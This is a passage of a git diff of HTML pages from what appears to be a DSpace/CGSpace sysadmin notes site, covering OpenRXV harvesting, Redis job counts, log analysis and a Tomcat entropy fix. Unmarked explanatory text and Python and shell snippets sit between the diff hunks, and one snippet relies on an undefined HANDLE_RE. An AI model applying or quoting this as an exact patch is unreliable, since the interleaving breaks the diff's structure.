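def count_handles(text):
    """Return (total matches, unique matches) for handle fields in text."""
    matches = HANDLE_RE.findall(text)
    return len(matches), len(set(matches))


# Tiny made-up sample: three handle fields, one of them repeated.
sample = '{"handle":"10568/1"}{"handle":"10568/1"}{"handle":"10568/2"}'
total, unique = count_handles(sample)
```

The difference `total - unique` is the number of duplicate entries; for the figures above that is 104797 - 99186 = 5611 duplicates in the harvest.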
@@ -469,8 +469,8 @@ $ grep -oE '"handle":"([[:digit:]]|\
                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] "GET /sitemap HTTP/1.1" 503 190 "-" "OpenRXV harvesting bot; https://github.com/ilri/OpenRXV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] "GET /sitemap HTTP/1.1" 503 190 "-" "OpenRXV harvesting bot; https://github.com/ilri/OpenRXV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I fixed nginx so it always allows people to get the sitemap and then re-ran the plugins… now it’s checking 180,000+ handles to see if they are collections or items…
• I see it fetched the sitemap three times; we need to make sure it only does so once for each repository
@@ -478,9 +478,9 @@ $ grep -oE '"handle":"([[:digit:]]|\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • According to the api logs we will be adding 5,697 items:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ docker logs api 2>/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                -5697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ docker logs api 2>/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +5697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Spent a few hours with Moayad troubleshooting and improving OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • We found a bug in the harvesting code that can occur when you are harvesting DSpace 5 and DSpace 6 instances, as DSpace 5 uses numeric (long) IDs, and DSpace 6 uses UUIDs
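To illustrate the difference between the two ID styles, here is a minimal sketch that classifies an item ID as numeric (DSpace 5 style) or UUID (DSpace 6 style). It is not the OpenRXV fix, which is not described here; `id_kind` is a hypothetical helper, and the sample values are made up.

```python
import uuid


def id_kind(value):
    """Classify an item ID as 'numeric', 'uuid', or 'unknown'."""
    text = str(value)
    # DSpace 5 style: plain ASCII digits.
    if text.isascii() and text.isdigit():
        return "numeric"
    # DSpace 6 style: anything the standard library parses as a UUID.
    try:
        uuid.UUID(text)
        return "uuid"
    except ValueError:
        return "unknown"


kinds = [
    id_kind(12345),
    id_kind("f81d4fae-7dec-11d0-a765-00a0c91e6bf6"),
    id_kind("not-an-id"),
]
```

Code that assumes every ID can be compared or stored as a number would break on the second kind, so checking the type up front is one way to keep mixed DSpace 5 and DSpace 6 harvests apart.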
@@ -496,35 +496,35 @@ $ grep -oE '"handle":"([[:digit:]]|\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ redis-cli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -127.0.0.1:6379> SCAN 0 COUNT 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -1) "49152"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -2) 1) "bull:plugins:476595"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   2) "bull:plugins:367382"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   3) "bull:plugins:369228"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   4) "bull:plugins:438986"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   5) "bull:plugins:366215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ redis-cli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +127.0.0.1:6379> SCAN 0 COUNT 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +1) "49152"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +2) 1) "bull:plugins:476595"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   2) "bull:plugins:367382"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   3) "bull:plugins:369228"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   4) "bull:plugins:438986"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   5) "bull:plugins:366215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • We can apparently get the names of the jobs in each hash using hget:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    127.0.0.1:6379> TYPE bull:plugins:401827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -hash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -127.0.0.1:6379> HGET bull:plugins:401827 name
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -"dspace_add_missing_items"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      127.0.0.1:6379> TYPE bull:plugins:401827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +hash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +127.0.0.1:6379> HGET bull:plugins:401827 name
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +"dspace_add_missing_items"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
• I whipped up a one-liner to get the keys for all plugin jobs, convert them to Redis HGET commands that extract the value of the name field, and then count the job names and sort them by those counts:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ redis-cli KEYS "bull:plugins:*" \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -  | sed -e 's/^bull/HGET bull/' -e 's/\([[:digit:]]\)$/\1 name/' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -  | ncat -w 3 localhost 6379 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -  | grep -v -E '^\$' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -      3 dspace_health_check
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -      4 -ERR wrong number of arguments for 'hget' command
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -     12 mel_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -    129 dspace_altmetrics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -    932 dspace_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      - 186428 dspace_add_missing_items
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ redis-cli KEYS "bull:plugins:*" \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  | sed -e 's/^bull/HGET bull/' -e 's/\([[:digit:]]\)$/\1 name/' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  | ncat -w 3 localhost 6379 \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  | grep -v -E '^\$' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +      3 dspace_health_check
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +      4 -ERR wrong number of arguments for 'hget' command
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +     12 mel_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    129 dspace_altmetrics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    932 dspace_downloads_and_views
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        + 186428 dspace_add_missing_items
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
• Note that this uses ncat to send all of the commands to Redis at once instead of one at a time (netcat didn’t work here because it doesn’t know when our input is finished, so it never quits)
  • I thought of using redis-cli --pipe, but then you have to construct the commands in the Redis protocol format, with the number of arguments and the length of each argument
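For reference, here is a minimal sketch of what constructing a command in the Redis protocol format might look like. The `resp_encode` function name is hypothetical (it is not part of redis-cli), and the sketch assumes ASCII arguments, since `${#arg}` counts characters rather than bytes unless the locale is `C`:

```shell
# Hypothetical helper: encode one command as a Redis protocol (RESP) array.
# Assumes ASCII arguments; run with LC_ALL=C if the keys may contain multibyte characters.
resp_encode() {
  # Array header: "*" followed by the number of arguments
  printf '*%d\r\n' "$#"
  for arg in "$@"; do
    # Each argument is a bulk string: "$" + length, then the value itself
    printf '$%d\r\n%s\r\n' "${#arg}" "$arg"
  done
}

# Example: encode the same HGET that was typed interactively above
resp_encode HGET bull:plugins:401827 name
```

Each key would need to be wrapped like this before being piped anywhere that expects raw protocol input, which is more work than the sed approach of sending plain inline commands through ncat.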
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -544,49 +544,49 @@ hash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Looking at the DSpace log I see there was definitely a higher number of sessions that day, perhaps twice the normal:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ for file in dspace.log.2021-06-[12]*; do echo "$file"; grep -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -19072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -19224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -19215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -16721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -17880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -12103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -4651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -22785
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -21406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -25967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -20850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -5945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -46371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -9024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -12521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -16163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -5886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ for file in dspace.log.2021-06-[12]*; do echo "$file"; grep -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +19072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +19224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +19215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +16721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +17880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +12103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +4651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +22785
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +21406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +25967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +20850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +5945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +46371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +9024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +12521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +16163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +5886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
• I see more than 15,000 unique IPs in the XMLUI logs alone on that day:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep '23/Jun/2021' | awk '{print $1}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -15835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep '23/Jun/2021' | awk '{print $1}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +15835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Annoyingly I found 37,000 more hits from Bing using dns:*msnbot* AND dns:*.msn.com. as a Solr filter
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • WTF, they are using a normal user agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -628,8 +628,8 @@ dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • The DSpace log shows:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
• The first one of these I see is from last night, 2021-06-29 at 10:47 PM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I restarted Tomcat 7 and CGSpace came back up…
• I didn’t see that Atmire had responded last week (on 2021-06-23) about the issues we had
@@ -641,14 +641,14 @@ dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Export a list of all CGSpace’s AGROVOC keywords with counts for Enrico and Elizabeth Arnaud to discuss with AGROVOC:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -COPY 20780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +COPY 20780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Actually Enrico wanted NON AGROVOC, so I extracted all the center and CRP subjects (ignoring system office and themes):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -COPY 1710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +COPY 1710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Fix an issue in the Ansible infrastructure playbooks for the DSpace role
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • It was causing the template module to fail when setting up the npm environment
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -657,13 +657,13 @@ COPY 1710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I saw a strange message in the Tomcat 7 journal on DSpace Test (linode26):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • What’s even crazier is that it is twice that on CGSpace (linode18)!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Apparently OpenJDK defaults to using /dev/random (see /etc/java-8-openjdk/security/java.security):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            securerandom.source=file:/dev/urandom
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              securerandom.source=file:/dev/urandom
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
• /dev/random can block for a long time while it waits for entropy, whereas /dev/urandom on modern Linux is a non-blocking, cryptographically secure pseudorandom number generator
• Now Tomcat starts much faster and no warning is printed, so I’m going to add this to our Ansible infrastructure playbooks
diff --git a/docs/2021-07/index.html b/docs/2021-07/index.html
index b9ba693b2..575020907 100644
--- a/docs/2021-07/index.html
+++ b/docs/2021-07/index.html
@@ -30,7 +30,7 @@ Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVO
 localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
 COPY 20994
 "/>
-
+
@@ -120,17 +120,17 @@ COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2021-07-04

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2021-07-04

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Update all Docker containers on the AReS server (linode20) and rebuild OpenRXV:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ cd OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ cd OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Then run all system updates and reboot the server
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • After the server came back up I cloned the openrxv-items-final index to openrxv-items-temp and started the plugins
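The `docker images | grep | sed | cut` pipeline in the update step above turns each row of the image table into a `repository:tag` reference and hands it to `docker pull`. As a rough illustration only, the same transformation can be sketched in Python. The function name `image_refs` and the sample table are hypothetical and not taken from the AReS server:

```python
def image_refs(docker_images_output: str) -> list[str]:
    """Build repository:tag references from `docker images` table output."""
    refs = []
    for line in docker_images_output.splitlines():
        # Skip blank lines and the header row, like `grep -v ^REPO`
        if not line.strip() or line.startswith("REPO"):
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        # The first two columns are the repository and the tag
        refs.append(f"{fields[0]}:{fields[1]}")
    return refs


# Hypothetical sample output, for illustration only
sample = """REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
nginx        stable    0123456789ab   2 weeks ago    142MB
redis        6         ba9876543210   3 weeks ago    105MB
"""

for ref in image_refs(sample):
    print(ref)
```

One difference from the shell version: because this sketch splits on whitespace rather than on `:`, a repository name that itself contains a colon (for example a registry host with a port) keeps its tag, whereas `cut -d: -f1,2` would cut the tag off.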
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -172,27 +172,27 @@ $ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 95 hits from Drupal in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 38 hits from DTS Agent in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 601 hits from Microsoft Office Existence Discovery in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 51 hits from Site24x7 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 62 hits from Trello in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 13574 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 144 hits from FlipboardProxy in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 37 hits from LinkWalker in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 427 hits from WordPress in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Total number of bot hits purged: 15030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 95 hits from Drupal in statistics
